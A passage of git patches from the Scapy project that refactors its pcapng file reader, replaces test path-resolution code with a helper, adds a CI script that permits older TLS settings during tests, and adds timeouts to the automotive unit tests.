3: self._read_block_spb, + 6: self._read_block_epb, } + self.endian = "!" # Will be overwritten by first SHB + if magic != b"\x0a\x0d\x0d\x0a": # PcapNg: raise Scapy_Exception( "Not a pcapng capture file (bad magic: %r)" % magic ) - # see https://github.com/pcapng/pcapng - blocklen_, magic = self.f.read(4), self.f.read(4) # noqa: F841 - if magic == b"\x1a\x2b\x3c\x4d": + + try: + self._read_block_shb() + except EOFError: + raise Scapy_Exception( + "The first SHB of the pcapng file is malformed !" + ) + + def _read_block(self, size=MTU): + # type: (int) -> Optional[Tuple[bytes, RawPcapNgReader.PacketMetadata]] # noqa: E501 + try: + blocktype = struct.unpack(self.endian + "I", self.f.read(4))[0] + except struct.error: + raise EOFError + if blocktype == 0x0A0D0D0A: + # This function updates the endianness based on the block content. + self._read_block_shb() + return None + try: + blocklen = struct.unpack(self.endian + "I", self.f.read(4))[0] + except struct.error: + raise EOFError + if blocklen < 12: + warning("Invalid block length !") + raise EOFError + block = self.f.read(blocklen - 12) + self._read_block_tail(blocklen) + return self.blocktypes.get( + blocktype, + lambda block, size: None + )(block, size) + + def _read_block_tail(self, blocklen): + # type: (int) -> None + if blocklen % 4: + pad = self.f.read(-blocklen % 4) + warning("PcapNg: bad blocklen %d (MUST be a multiple of 4. " + "Ignored padding %r" % (blocklen, pad)) + try: + if blocklen != struct.unpack(self.endian + 'I', + self.f.read(4))[0]: + raise EOFError("PcapNg: Invalid pcapng block (bad blocklen)") + except struct.error: + raise EOFError + + def _read_block_shb(self): + # type: () -> None + _blocklen = self.f.read(4) + endian = self.f.read(4) + if endian == b"\x1a\x2b\x3c\x4d": self.endian = ">" - elif magic == b"\x4d\x3c\x2b\x1a": + elif endian == b"\x4d\x3c\x2b\x1a": self.endian = "<" else: - raise Scapy_Exception("Not a pcapng capture file (bad magic)") - self.f.read(12) - blocklen = struct.unpack("!I", blocklen_)[0] # type: int - # Read default options - self.default_options = self.read_options( - self.f.read(blocklen - 24) - ) - try: - self.f.seek(0) - except Exception: - pass + warning("Bad magic in Section Header block (not a pcapng file?)") + raise EOFError + + blocklen = struct.unpack(self.endian + "I", _blocklen)[0] + if blocklen < 16: + warning("Invalid SHB block length!") + raise EOFError + options = self.f.read(blocklen - 16) + self._read_block_tail(blocklen) + self._read_options(options) def _read_packet(self, size=MTU): # type: ignore # type: (int) -> Tuple[bytes, RawPcapNgReader.PacketMetadata] @@ -1401,29 +1449,11 @@ def _read_packet(self, size=MTU): # type: ignore """ while True: - try: - blocktype, blocklen = struct.unpack(self.endian + "2I", - self.f.read(8)) - except struct.error: - raise EOFError - block = self.f.read(blocklen - 12) - if blocklen % 4: - pad = self.f.read(4 - (blocklen % 4)) - warning("PcapNg: bad blocklen %d (MUST be a multiple of 4. " - "Ignored padding %r" % (blocklen, pad)) - try: - if (blocklen,) != struct.unpack(self.endian + 'I', - self.f.read(4)): - warning("PcapNg: Invalid pcapng block (bad blocklen)") - raise EOFError - except struct.error: - raise EOFError - res = self.blocktypes.get(blocktype, - lambda block, size: None)(block, size) + res = self._read_block() if res is not None: return res - def read_options(self, options): + def _read_options(self, options): # type: (bytes) -> Dict[str, int] """Section Header Block""" opts = self.default_options.copy() @@ -1446,23 +1476,31 @@ def read_options(self, options): options = options[4 + length:] return opts - def read_block_idb(self, block, _): + def _read_block_idb(self, block, _): # type: (bytes, int) -> None """Interface Description Block""" - options = self.read_options(block[16:]) - interface = struct.unpack( # type: ignore - self.endian + "HxxI", - block[:8] - ) + (options["tsresol"],) # type: Tuple[int, int, int] + # 2 bytes LinkType + 2 bytes Reserved + # 4 bytes Snaplen + options = self._read_options(block[8:-4]) + try: + interface = struct.unpack( # type: ignore + self.endian + "HxxI", + block[:8] + ) + (options["tsresol"],) # type: Tuple[int, int, int] + except struct.error: + raise EOFError self.interfaces.append(interface) - def read_block_epb(self, block, size): + def _read_block_epb(self, block, size): # type: (bytes, int) -> Tuple[bytes, RawPcapNgReader.PacketMetadata] """Enhanced Packet Block""" - intid, tshigh, tslow, caplen, wirelen = struct.unpack( - self.endian + "5I", - block[:20], - ) + try: + intid, tshigh, tslow, caplen, wirelen = struct.unpack( + self.endian + "5I", + block[:20], + ) + except struct.error: + raise EOFError return (block[20:20 + caplen][:size], RawPcapNgReader.PacketMetadata(linktype=self.interfaces[intid][0], # noqa: E501 tsresol=self.interfaces[intid][2], # noqa: E501 @@ -1470,7 +1508,7 @@ def read_block_epb(self, block, size): tslow=tslow, wirelen=wirelen)) - def read_block_spb(self, block, size): + def _read_block_spb(self, block, size): # type: (bytes, int) -> Tuple[bytes, RawPcapNgReader.PacketMetadata] """Simple Packet Block""" # "it MUST be assumed that all the Simple Packet Blocks have @@ -1486,7 +1524,7 @@ def read_block_spb(self, block, size): tslow=None, wirelen=wirelen)) - def read_block_pkt(self, block, size): + def _read_block_pkt(self, block, size): # type: (bytes, int) -> Tuple[bytes, RawPcapNgReader.PacketMetadata] """(Obsolete) Packet Block""" intid, drops, tshigh, tslow, caplen, wirelen = struct.unpack( diff --git a/test/pcaps/macos.pcapng.gz b/test/pcaps/macos.pcapng.gz new file mode 100644 index 0000000000000000000000000000000000000000..491e13d8b2d5c9ef4b3bc00eb1fbaa91be6e72e0 GIT binary patch literal 526 zcmV+p0`dJHiwFP!000003ghDC<*H#|VDPokmSP0b|Dk}9L4=_=HMt}+KTjbeH8CZ% zNFgaFKRKI;fsLWU!Ytm*gn@yXftSH0v8X&VPr=Yq&rHt%sGo&Fo}nbUAf+_7KtUrX zGpQgsu|T0LwWt_mkfENXo}nfK2!QMa*{1-dU$HVUFab?W%`*VYgT&c@*o6tqWsu** z%E0kxlcFe)55hgI6LjB95HanRyBNU1;L57#x8@LZ4X}88{d+8KfsVGJ;8_N(QDhM^~d9M}I2^=4|%k zESZdV?I*H=Nwy@0KiLdI>=4(uf(&3_;Nbeq!US}74p>m?(GtcAkkgrugtK_+mfqml zcj}SD=^DR%0t^fr9F~}SJ4*HVf$T;#gd5oq=?NiFLrlE6z=p(~um^{`T{Ol~Ysf*Ir-j;aHaZ`ydO`zI_;m@S(V*#ugSP_r<}6XbP@9Xty-e;W@}9 z>rQSt*miur1BM~|D27aY0W~D#oEX>;zw|{1W9wHO_zf~d>F|<+1&cHffYmYqQy?S6 QEO6QZ0B^jEF5m(H03FWqE&u=k literal 0 HcmV?d00001 diff --git a/test/regression.uts b/test/regression.uts index 3fa99744ed5..bd7a879dff3 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1819,6 +1819,10 @@ pktpcapngdefaults = rdpcap(pcapngdefaults) assert pktpcapngdefaults[0].time == 1575115986.114775512 assert Ether in pktpcapngdefaults[0] += Read a pcapng with little-endian SHB +pktcapng = sniff(offline=scapy_path("/test/pcaps/macos.pcapng.gz")) +assert len(pktcapng) != 0 + = Read a pcap file with wirelen != captured len pktpcapwirelen = rdpcap(pcapwirelenfile) @@ -1983,11 +1987,21 @@ assert isinstance(pkt, Padding) and pkt.load == b'\xeay$\xf6' pkt = pkt.payload assert isinstance(pkt, NoPayload) -= Invalid pcapng file += Invalid pcapng files from io import BytesIO -invalid_pcapngfile = BytesIO(b'\n\r\r\n\r\x00\x00\x00M<+\x1a\xb2<\xb2\xa1\x01\x00\x00\x00\r\x00\x00\x00M<+\x1a\x80\xaa\xb2\x02') -assert(len(rdpcap(invalid_pcapngfile)) == 0) + +# Invalid PCAPNG format -> Raise +try: + invalid_pcapngfile_1 = BytesIO(b'\n\r\r\n\r\x00\x00\x00M<+\x1a\xb2<\xb2\xa1\x01\x00\x00\x00\r\x00\x00\x00M<+\x1a\x80\xaa\xb2\x02') + rdpcap(invalid_pcapngfile_1) + assert False +except Scapy_Exception: + pass + +# Invalid Packet in PCAPNG -> return +invalid_pcapngfile_2 = BytesIO(b'\n\r\r\n\x00\x00\x00\x10\x1a+Google
A faster way to browse the web



 
  Advanced Search
  Language Tools


Advertising Programs - Business Solutions - About Google

©2010 - Privacy
""" @@ -80,9 +76,7 @@ load_layer("http") import os import gzip -tmp = "/test/pcaps/http_compressed.pcap" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename +filename = scapy_path("/test/pcaps/http_compressed.pcap") # First without auto decompression @@ -115,9 +109,7 @@ load_layer("http") import os import brotli -tmp = "/test/pcaps/http_compressed-brotli.pcap" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename +filename = scapy_path("/test/pcaps/http_compressed-brotli.pcap") # First without auto decompression @@ -152,9 +144,7 @@ import zstandard # sample server: $ socat -v TCP-LISTEN:8080,fork,reuseaddr SYSTEM:'(echo -ne "HTTP/1.1 200 OK\r\nContent-Encoding: zstd\r\n\r\n") > tmp && dd bs=1G count=1 status=none | zstd --stdout >> tmp && cat tmp' # sample client: $ curl -v localhost:8080/tmp_echo_zstd_request_for_testing -o a.html -tmp = "/test/pcaps/http_compressed-zstd.pcap" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename +filename = scapy_path("/test/pcaps/http_compressed-zstd.pcap") # First without auto decompression @@ -179,9 +169,7 @@ assert b'tmp_echo_zstd_request_for_testing' in pkts[0].load = HTTP PSH bug fix -tmp = "/test/pcaps/http_tcp_psh.pcap.gz" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename +filename = scapy_path("/test/pcaps/http_tcp_psh.pcap.gz") pkts = sniff(offline=filename, session=TCPSession) @@ -208,9 +196,7 @@ from scapy.contrib.http2 import H2Frame import os -tmp = "/test/pcaps/http2_h2c.pcap" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename +filename = scapy_path("/test/pcaps/http2_h2c.pcap") pkts = sniff(offline=filename, session=TCPSession) diff --git a/test/scapy/layers/netflow.uts b/test/scapy/layers/netflow.uts index 45610be891a..61f913c80f9 100644 --- a/test/scapy/layers/netflow.uts +++ b/test/scapy/layers/netflow.uts @@ -39,9 +39,7 @@ nf5.version == 5 and nf5[NetflowHeaderV5].count == 2 and isinstance(nf5[NetflowR = NetflowV9 - advanced dissection import os -tmp = "/test/pcaps/netflowv9.pcap" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename +filename = scapy_path("/test/pcaps/netflowv9.pcap") a = rdpcap(filename) a = netflowv9_defragment(a) @@ -167,9 +165,7 @@ assert raw(pkt) == dat = IPFix dissection import os -tmp = "/test/pcaps/ipfix.pcap" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename +filename = scapy_path("/test/pcaps/ipfix.pcap") a = sniff(offline=filename, session=NetflowSession) # Templates @@ -243,9 +239,7 @@ assert raw(pkt) == b'\x00\n\x00>\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 = NetflowSession - dissect packet NetflowV9 packets on-the-flow import os -tmp = "/test/pcaps/netflowv9.pcap" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename +filename = scapy_path("/test/pcaps/netflowv9.pcap") dissected_packets = [] def callback(pkt): diff --git a/test/sslv2.uts b/test/sslv2.uts index 5222682d917..0959a9cbe23 100644 --- a/test/sslv2.uts +++ b/test/sslv2.uts @@ -85,9 +85,7 @@ mk_enc.decryptedkey is None = Reading SSLv2 session - Importing server compromised key import os -tmp = "/test/tls/pki/srv_key.pem" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename +filename = scapy_path("/test/tls/pki/srv_key.pem") rsa_key = PrivKeyRSA(filename) t.tls_session.server_rsa_key = rsa_key diff --git a/test/tls.uts b/test/tls.uts index 56a8ad7e16b..cbedcdd20f3 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -1081,9 +1081,7 @@ assert server_finished.vdata == hex_bytes(b'42c9765e833997b6714fec75') = Reading TLS test session - Full TLSNewSessionTicket captured import os -tmp = "/test/pcaps/tls_new-session-ticket.pcap" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename +filename = scapy_path("/test/pcaps/tls_new-session-ticket.pcap") a = rdpcap(filename) pkt = a[4] assert isinstance(pkt[TLS].msg[0], TLSNewSessionTicket) @@ -1184,9 +1182,7 @@ load_layer("tls") from scapy.layers.tls.cert import PrivKeyRSA from scapy.layers.tls.record import TLSApplicationData import os -tmp = "/test/tls/pki/srv_key.pem" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename +filename = scapy_path("/test/tls/pki/srv_key.pem") key = PrivKeyRSA(filename) ch = b'\x16\x03\x01\x005\x01\x00\x001\x03\x01X\xac\x0e\x8c\xe46\xe9\xedo\xda\x085$M\xae$\x90\xd9\xa93\xb7(\x13J\xf9\xc5?\xef\xf4\x96\xa1\xfa\x00\x00\x04\x00/\x00\xff\x01\x00\x00\x04\x00#\x00\x00' sh = b'\x16\x03\x01\x005\x02\x00\x001\x03\x01\x88\xac\xd4\xaf\x93~\xb5\x1b8c\xe7)\xa6\x9b\xa9\xed\xf3\xf3*\xdb\x00\x8bB\xf6\n\xcbz\x8eP\x83`G\x00\x00/\x00\x00\t\xff\x01\x00\x01\x00\x00#\x00\x00\x16\x03\x01\x03\xac\x0b\x00\x03\xa8\x00\x03\xa5\x00\x03\xa20\x82\x03\x9e0\x82\x02\x86\xa0\x03\x02\x01\x02\x02\t\x00\xfe\x04W\r\xc7\'\xe9\xf60\r\x06\t*\x86H\x86\xf7\r\x01\x01\x0b\x05\x000T1\x0b0\t\x06\x03U\x04\x06\x13\x02MN1\x140\x12\x06\x03U\x04\x07\x0c\x0bUlaanbaatar1\x170\x15\x06\x03U\x04\x0b\x0c\x0eScapy Test PKI1\x160\x14\x06\x03U\x04\x03\x0c\rScapy Test CA0\x1e\x17\r160916102811Z\x17\r260915102811Z0X1\x0b0\t\x06\x03U\x04\x06\x13\x02MN1\x140\x12\x06\x03U\x04\x07\x0c\x0bUlaanbaatar1\x170\x15\x06\x03U\x04\x0b\x0c\x0eScapy Test PKI1\x1a0\x18\x06\x03U\x04\x03\x0c\x11Scapy Test Server0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\xcc\xf1\xf1\x9b`-`\xae\xf2\x98\r\')\xd9\xc0\tYL\x0fJ0\xa8R\xdf\xe5\xb1!\x9fO\xc3=V\x93\xdd_\xc6\xf7\xb3\xf6U\x8b\xe7\x92\xe2\xde\xf2\x85I\xb4\xa1,\xf4\xfdv\xa8g\xca\x04 `\x11\x18\xa6\xf2\xa9\xb6\xa6\x1d\xd9\xaa\xe5\xd9\xdb\xaf\xe6\xafUW\x9f\xffR\x89e\xe6\x80b\x80!\x94\xbc\xcf\x81\x1b\xcbg\xc2\x9d\xb5\x05w\x04\xa6\xc7\x88\x18\x80xh\x956\xde\x97\x1b\xb6a\x87B\x1au\x98E\x82\xeb>2\x11\xc8\x9b\x86B9\x8dM\x12\xb7X\x1b\x19\xf3\x9d+\xa1\x98\x82\xca\xd7;$\xfb\t9\xb0\xbc\xc2\x95\xcf\x82)u\x16)?B \x17+M@\x8cVl\xad\xba\x0f4\x85\xb1\x7f@yqx\xb7\xa5\x04\xbb\x94\xf7\xb5A\x95\xee|\xeb\x8d\x0cyhY\xef\xcb\xb3\xfa>x\x1e\xeegLz\xdd\xe0\x99\xef\xda\xe7\xef\xb2\t]\xbe\x80 !\x05\x83,D\xdb]*v)\xa5\xb0#\x88t\x07T"\xd6)z\x92\xf5o-\x9e\xe7\xf8&+\x9cXe\x02\x03\x01\x00\x01\xa3o0m0\t\x06\x03U\x1d\x13\x04\x020\x000\x0b\x06\x03U\x1d\x0f\x04\x04\x03\x02\x05\xe00\x1d\x06\x03U\x1d\x0e\x04\x16\x04\x14\xa1+ p\xd2k\x80\xe5e\xbc\xeb\x03\x0f\x88\x9ft\xad\xdd\xf6\x130\x1f\x06\x03U\x1d#\x04\x180\x16\x80\x14fS\x94\xf4\x15\xd1\xbdgh\xb0Q725\xe1\xa4\xaa\xde\x07|0\x13\x06\x03U\x1d%\x04\x0c0\n\x06\x08+\x06\x01\x05\x05\x07\x03\x010\r\x06\t*\x86H\x86\xf7\r\x01\x01\x0b\x05\x00\x03\x82\x01\x01\x00\x81\x88\x92sk\x93\xe7\x95\xd6\xddA\xee\x8e\x1e\xbd\xa3HX\xa7A5?{}\xd07\x98\x0e\xb8,\x94w\xc8Q6@\xadY\t(\xc8V\xd6\xea[\xac\xb4\xd8?h\xb7f\xca\xe1V7\xa9\x00e\xeaQ\xc9\xec\xb2iI]\xf9\xe3\xc0\xedaT\xc9\x12\x9f\xc6\xb0\nsU\xe8U5`\xef\x1c6\xf0\xda\xd1\x90wV\x04\xb8\xab8\xee\xf7\t\xc5\xa5\x98\x90#\xea\x1f\xdb\x15\x7f2(\x81\xab\x9b\x85\x02K\x95\xe77Q{\x1bH.\xfb>R\xa3\r\xb4F\xa9\x92:\x1c\x1f\xd7\n\x1eXJ\xfa.Q\x8f)\xc6\x1e\xb8\x0e1\x0es\xf1\'\x88\x17\xca\xc8i\x0c\xfa\x83\xcd\xb3y\x0e\x14\xb0\xb8\x9b/:-\t\xe3\xfc\x06\xf0:n\xfd6;+\x1a\t*\xe8\xab_\x8c@\xe4\x81\xb2\xbc\xf7\x83g\x11nN\x93\xea"\xaf\xff\xa3\x9awWv\xd0\x0b8\xac\xf8\x8a\x945\x8e\xd7\xd4a\xcc\x01\xff$\xb4\x8fa#\xba\x88\xd7Y\xe4\xe9\xba*N\xb5\x15\x0f\x9c\xd0\xea\x06\x91\xd9\xde\xab\x16\x03\x01\x00\x04\x0e\x00\x00\x00' @@ -1498,9 +1494,7 @@ conf.debug_dissector = dd import os -tmp = "/test/pcaps/tls_tcp_frag.pcap.gz" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename +filename = scapy_path("/test/pcaps/tls_tcp_frag.pcap.gz") dd = conf.debug_dissector conf.debug_dissector = False diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index cd7c4d27f48..95b6b9dc28f 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -63,9 +63,6 @@ def check_output_for_data(out, err, expected_data): else: return (False, None) -def get_file(filename): - return os.path.abspath(os.getenv("SCAPY_ROOT_DIR")+filename if not os.path.exists(filename) else filename) - def run_tls_test_server(expected_data, q, curve=None, cookie=False, client_auth=False, psk=None, handle_session_ticket=False): @@ -73,9 +70,8 @@ def run_tls_test_server(expected_data, q, curve=None, cookie=False, client_auth= print("Server started !") with captured_output() as (out, err): # Prepare automaton - mycert = get_file("/test/tls/pki/srv_cert.pem") - mykey = get_file("/test/tls/pki/srv_key.pem") - print(os.environ["SCAPY_ROOT_DIR"]) + mycert = scapy_path("/test/tls/pki/srv_cert.pem") + mykey = scapy_path("/test/tls/pki/srv_key.pem") print(mykey) print(mycert) assert os.path.exists(mycert) @@ -104,9 +100,9 @@ def run_tls_test_server(expected_data, q, curve=None, cookie=False, client_auth= def run_openssl_client(msg, suite="", version="", tls13=False, client_auth=False, psk=None, sess_out=None): # Run client - CA_f = get_file("/test/tls/pki/ca_cert.pem") - mycert = get_file("/test/tls/pki/cli_cert.pem") - mykey = get_file("/test/tls/pki/cli_key.pem") + CA_f = scapy_path("/test/tls/pki/ca_cert.pem") + mycert = scapy_path("/test/tls/pki/cli_cert.pem") + mykey = scapy_path("/test/tls/pki/cli_key.pem") args = [ "openssl", "s_client", "-connect", "127.0.0.1:4433", "-debug", @@ -222,8 +218,8 @@ def run_tls_test_client(send_data=None, cipher_suite_code=None, version=None, client_auth=False, key_update=False, stop_server=True, session_ticket_file_out=None, session_ticket_file_in=None): print("Loading client...") - mycert = get_file("/test/tls/pki/cli_cert.pem") if client_auth else None - mykey = get_file("/test/tls/pki/cli_key.pem") if client_auth else None + mycert = scapy_path("/test/tls/pki/cli_cert.pem") if client_auth else None + mykey = scapy_path("/test/tls/pki/cli_key.pem") if client_auth else None commands = [send_data] if key_update: commands.append(b"key_update") @@ -268,7 +264,7 @@ def test_tls_client(suite, version, curve=None, cookie=False, client_auth=False, print("Thread synchronised") # Run client if sess_in_out: - file_sess = get_file("/test/session") + file_sess = scapy_path("/test/session") run_tls_test_client(msg, suite, version, client_auth, key_update, session_ticket_file_out=file_sess, stop_server=False) run_tls_test_client(msg, suite, version, client_auth, key_update, session_ticket_file_in=file_sess, @@ -352,7 +348,7 @@ test_tls_client("1305", "0304", client_auth=True, sess_in_out=True) = Clear session file -file_sess = get_file("/test/session") +file_sess = scapy_path("/test/session") try: os.remove(file_sess) except: From 26a91c5720e4a0656689c9ba019594b8ef3f33c6 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 6 Feb 2021 19:21:29 +0100 Subject: [PATCH 0499/1632] Unit tests: allow TLS<1.1 in openssl config --- .config/ci/install.sh | 1 + .config/ci/openssl.py | 48 +++++++++++++++++++++++++++++++++++++++++++ .config/ci/test.sh | 3 +++ tox.ini | 2 +- 4 files changed, 53 insertions(+), 1 deletion(-) create mode 100755 .config/ci/openssl.py diff --git a/.config/ci/install.sh b/.config/ci/install.sh index 251b1cf0d8d..746bd794857 100755 --- a/.config/ci/install.sh +++ b/.config/ci/install.sh @@ -1,4 +1,5 @@ #!/bin/bash + # Install on osx if [ "$OSTYPE" = "darwin"* ] || [ "$TRAVIS_OS_NAME" = "osx" ] then diff --git a/.config/ci/openssl.py b/.config/ci/openssl.py new file mode 100755 index 00000000000..4a28fb932ad --- /dev/null +++ b/.config/ci/openssl.py @@ -0,0 +1,48 @@ +# This file is part of Scapy +# Copyright (C) Gabriel Potter + +""" +Create a duplicate of the OpenSSL config to be able to use TLS < 1.2 +This returns the path to this new config file. +""" + +import os +import re +import subprocess +import tempfile + +# Get OpenSSL config file +OPENSSL_DIR = re.search( + b"OPENSSLDIR: \"(.*)\"", + subprocess.Popen( + ["openssl", "version", "-d"], + stdout=subprocess.PIPE + ).communicate()[0] +).group(1).decode() +OPENSSL_CONFIG = os.path.join(OPENSSL_DIR, 'openssl.cnf') + +# https://askubuntu.com/a/1233456 +HEADER = b"openssl_conf = default_conf\n" +FOOTER = b""" +[ default_conf ] + +ssl_conf = ssl_sect + +[ssl_sect] + +system_default = system_default_sect + +[system_default_sect] +MinProtocol = TLSv1.2 +CipherString = DEFAULT:@SECLEVEL=1 +""" + +# Copy and edit +with open(OPENSSL_CONFIG, 'rb') as fd: + DATA = fd.read() + +DATA = HEADER + DATA + FOOTER + +with tempfile.NamedTemporaryFile(suffix=".cnf", delete=False) as fd: + fd.write(DATA) + print(fd.name) diff --git a/.config/ci/test.sh b/.config/ci/test.sh index 1de9cde2ab3..e30c8924af7 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -75,6 +75,9 @@ then esac fi +# Configure OpenSSL +export OPENSSL_CONF=$(python `dirname $BASH_SOURCE`/openssl.py) + # Dump vars (the others were already dumped in install.sh) echo UT_FLAGS=$UT_FLAGS echo TOXENV=$TOXENV diff --git a/tox.ini b/tox.ini index 6cddece7f94..e3dd76f315d 100644 --- a/tox.ini +++ b/tox.ini @@ -13,7 +13,7 @@ minversion = 2.9 [testenv] description = "Scapy unit tests" whitelist_externals = sudo -passenv = PATH PWD PROGRAMFILES WINDIR SYSTEMROOT +passenv = PATH PWD PROGRAMFILES WINDIR SYSTEMROOT OPENSSL_CONF # Used by scapy SCAPY_USE_LIBPCAP deps = mock From 99a1af85211db276bb7086b42fcfd302456be0c9 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 8 Feb 2021 17:08:41 +0100 Subject: [PATCH 0500/1632] Cleanup some automaton tests (timeouts in join, wait...) (#3082) --- test/contrib/automotive/ecu.uts | 24 ++++++---------- test/contrib/automotive/interface_mockup.py | 6 ++++ test/contrib/automotive/uds_utils.uts | 7 ++--- test/contrib/automotive/xcp/xcp.uts | 3 +- test/contrib/cansocket.uts | 8 +++--- test/contrib/cansocket_native.uts | 4 +-- test/contrib/cansocket_python_can.uts | 32 ++++++++++----------- test/contrib/isotp.uts | 19 ++---------- test/linux.uts | 9 ++++-- test/regression.uts | 12 ++++---- test/tools/isotpscanner.uts | 20 ------------- test/tools/xcpscanner.uts | 4 +-- test/tuntap.uts | 2 +- 13 files changed, 58 insertions(+), 92 deletions(-) diff --git a/test/contrib/automotive/ecu.uts b/test/contrib/automotive/ecu.uts index 7eed2319fac..42770aa713e 100644 --- a/test/contrib/automotive/ecu.uts +++ b/test/contrib/automotive/ecu.uts @@ -60,7 +60,6 @@ msgs = [UDS(service=16) / UDS_DSC(diagnosticSessionType=3), # no_docs ecu = Ecu(verbose=False, store_supported_responses=False) ecu.update(PacketList(msgs)) -print(ecu.log) assert len(ecu.log["DiagnosticSessionControl"]) == 5 # no_docs timestamp, value = ecu.log["DiagnosticSessionControl"][0] assert timestamp > 0 # no_docs @@ -80,7 +79,6 @@ msgs = [UDS(service=16) / UDS_DSC(diagnosticSessionType=3), # no_docs ecu = Ecu(verbose=True, logging=False, store_supported_responses=False) ecu.update(PacketList(msgs)) -print(ecu.current_session) assert ecu.current_session == 3 # no_docs assert ecu.current_security_level == 0 # no_docs assert ecu.communication_control == 0 # no_docs @@ -98,8 +96,6 @@ ecu = Ecu(verbose=False, logging=False, store_supported_responses=True) ecu.update(PacketList(msgs)) supported_responses = ecu.supported_responses unanswered_packets = ecu.unanswered_packets -print(supported_responses) -print(unanswered_packets) assert ecu.current_session == 3 # no_docs assert ecu.current_security_level == 0 # no_docs assert ecu.communication_control == 0 # no_docs @@ -121,14 +117,12 @@ assert unanswered_packets[0].diagnosticSessionType == 4 # no_docs * which are then casted to ``UDS`` objects through the ``basecls`` parameter with PcapReader("test/contrib/automotive/ecu_trace.pcap.gz") as sock: - udsmsgs = sniff(session=ISOTPSession, session_kwargs={"use_ext_addr":False, "basecls":UDS}, count=50, opened_socket=sock) + udsmsgs = sniff(session=ISOTPSession, session_kwargs={"use_ext_addr":False, "basecls":UDS}, count=50, opened_socket=sock, timeout=3) assert len(udsmsgs) == 50 # no_docs ecu = Ecu() ecu.update(udsmsgs) -print(ecu.log) -print(ecu.supported_responses) response = ecu.supported_responses[0] # no_docs assert response.in_correct_session(1) # no_docs assert response.has_security_access(0) # no_docs @@ -157,13 +151,11 @@ assert len(ecu.log["TransferData"]) == 2 session = EcuSession() with PcapReader("test/contrib/automotive/ecu_trace.pcap.gz") as sock: - udsmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "use_ext_addr":False, "basecls":UDS}, count=50, opened_socket=sock) + udsmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "use_ext_addr":False, "basecls":UDS}, count=50, opened_socket=sock, timeout=3) assert len(udsmsgs) == 50 # no_docs ecu = session.ecu -print(ecu.log) -print(ecu.supported_responses) response = ecu.supported_responses[0] # no_docs assert response.in_correct_session(1) # no_docs assert response.has_security_access(0) # no_docs @@ -187,25 +179,25 @@ assert len(ecu.log["TransferData"]) == 2 # no_docs session = EcuSession() with CandumpReader("test/contrib/automotive/gmlan_trace.candump") as sock: - gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=2, opened_socket=sock) + gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=2, opened_socket=sock, timeout=3) ecu = session.ecu print("Check 1 after change to diagnostic mode") assert len(ecu.supported_responses) == 1 assert ecu.current_session == 3 assert ecu.current_security_level == 0 - gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=8, opened_socket=sock) + gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=8, opened_socket=sock, timeout=3) ecu = session.ecu print("Check 2 after some more messages were read") assert len(ecu.supported_responses) == 4 assert ecu.current_session == 3 assert ecu.current_security_level == 0 - gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=10, opened_socket=sock) + gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=10, opened_socket=sock, timeout=3) ecu = session.ecu print("Check 3 after change to programming mode (bootloader)") assert len(ecu.supported_responses) == 5 assert ecu.current_session == 2 assert ecu.current_security_level == 0 - gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=16, opened_socket=sock) + gmlanmsgs = 